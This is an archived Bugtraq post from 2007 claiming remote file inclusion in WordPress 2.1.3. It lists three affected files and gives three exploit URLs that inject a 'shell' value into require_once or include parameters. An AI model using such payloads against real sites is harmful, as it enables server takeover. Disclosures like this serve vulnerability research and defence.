Bugtraq mailing list archives

WordPress v2.1.3 >> remote file include~

From: s433d_only_linux () yahoo de
Date: 25 Apr 2007 08:17:45 -0000

by : www.hackeraz.ir userz , saeid...
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3         Remote File Inclusion  #
####################################################
Affected Software .: WordPress >> 2.1.3            #
Download..: http://wordpress-deutschland.org       #
Risk ..............: high                          #
Date .........: 25/4/2007                          #
Found by ..........: s433d_only_linux              #
Contact ...........: s433d_only_linux () yahoo de     #
Web .............: Www.hackerz.ir                  #
special thanx ........... Ali Jasbi my beste friend#
####################################################
Affected File:                                     #
wordpress/wp-settings.php                                #        
wordpress/wp-includes/template-loader.php                #
wordpress/wp-includes/theme.php                    #
####################################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
######################################################

Current thread:

WordPress v2.1.3 >> remote file include~ s433d_only_linux (Apr 25)
- <Possible follow-ups>
- Re: WordPress v2.1.3 >> remote file include~ otto (Apr 26)